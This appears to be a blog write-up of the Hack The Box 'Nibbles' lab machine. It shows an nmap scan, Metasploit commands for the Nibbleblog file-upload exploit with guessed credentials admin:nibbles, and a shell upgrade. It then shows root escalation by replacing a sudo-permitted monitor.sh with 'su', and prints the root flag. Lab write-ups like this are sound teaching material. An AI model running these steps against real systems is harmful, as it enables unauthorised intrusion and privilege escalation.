Hack the box Nibbles write up

2.3
(3)

Introduction

It is a easy machine from Hack the box it involves exploiting nibble service followed by tampering a script to get the root shell.

Steps involved

1-Port Scan
2-Visiting website
3-Finding Vulnerability
4-Exploiting via metasploit
5-Privilage escalation via script

Commands involved

1-nmap -sV -sC -A -v -oV 10.10.10.75
2-msfconsole
3-set rhost 10.10.10.75
4-set username admin
5-set password nibbles
6-set targeturi /nibbleblog
7-sudo -l
8-echo "#! /bin/bash" > monitor.sh
9-echo "su" >> monitor.sh
10-sudo /home/nibbler/personal/stuff/monitor.sh

Port Scan

Nmap 7.70 scan initiated Sun Apr 26 10:01:32 2020 as: nmap -sV -sC -A -v -oV 10.10.10.75
Increasing send delay for 10.10.10.75 from 0 to 5 due to 172 out of 572 dropped probes since last increase.
Nmap scan report for 10.10.10.75
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=4/26%OT=22%CT=1%CU=39953%PV=Y%DS=2%DC=T%G=Y%TM=5EA5949
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=100%GCD=1%ISR=10B%TI=Z%II=I%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.001 days (since Sun Apr 26 10:01:46 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 423.45 ms 10.10.14.1
2 425.66 ms 10.10.10.75
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Apr 26 10:03:01 2020 -- 1 IP address (1 host up) scanned in 89.14 seconds

Visiting website

The first step i always do is visit the website.

The code showed me that there is a /nibblelog Dir

Hack the box Nibbles write up

Finding Vulnerability

So now we see it’s running nibbles .So let’s search exploit for it.

Hack the box Nibbles write up

And i got a metasploit model but we need creds for this .

So there was a guessing part in it.

Hack the box Nibbles write up

Exploiting via metasploit

The creds that worked were admin:nibbles

msf5 exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
rhost => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
tageturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > run

And now we got a meterpreter shell so we can read the user flag.

Hack the box Nibbles write up

Let’s get a full shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'
bash -i

After some enumeration got a .sh wile .

[email protected]:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
[email protected]:/home/nibbler$ ls -al
ls -al
total 24
drwxr-xr-x 4 nibbler nibbler 4096 Apr 26 10:28 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 personal
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt

Privilage escalation via script

Now let’s check the sudo permissions of the user.

 [email protected]:/$ sudo -l 
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

It says that user nibbler can run monitor.sh as root.

So what did is removed the original file and replaced with my file.

echo "#! /bin/bash" > monitor.sh
echo "su" >> monitor.sh

And ran it which gave me the root access.

[email protected]:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
whoami
whoami
ls
ls
sudo: unable to resolve host Nibbles: Connection timed out
[email protected]:/home/nibbler/personal/stuff# whoami
root
[email protected]:/home/nibbler/personal/stuff# ls
monitor.sh
[email protected]:/home/nibbler/personal/stuff# cat monitor.sh
cat monitor.sh
! /bin/bash
su
[email protected]:/home/nibbler/personal/stuff# ls -al
ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Apr 26 10:41 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxr-xr-x 1 nibbler nibbler 16 Apr 26 10:53 monitor.sh
[email protected]:/home/nibbler/personal/stuff# cat /root/root.txt
cat /root/root.txt
b6d745c0dfb6457c55591efc898ef88c
[email protected]:/home/nibbler/personal/stuff#

How useful was this post?

Click on a star to rate it!

Average rating 2.3 / 5. Vote count: 3

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin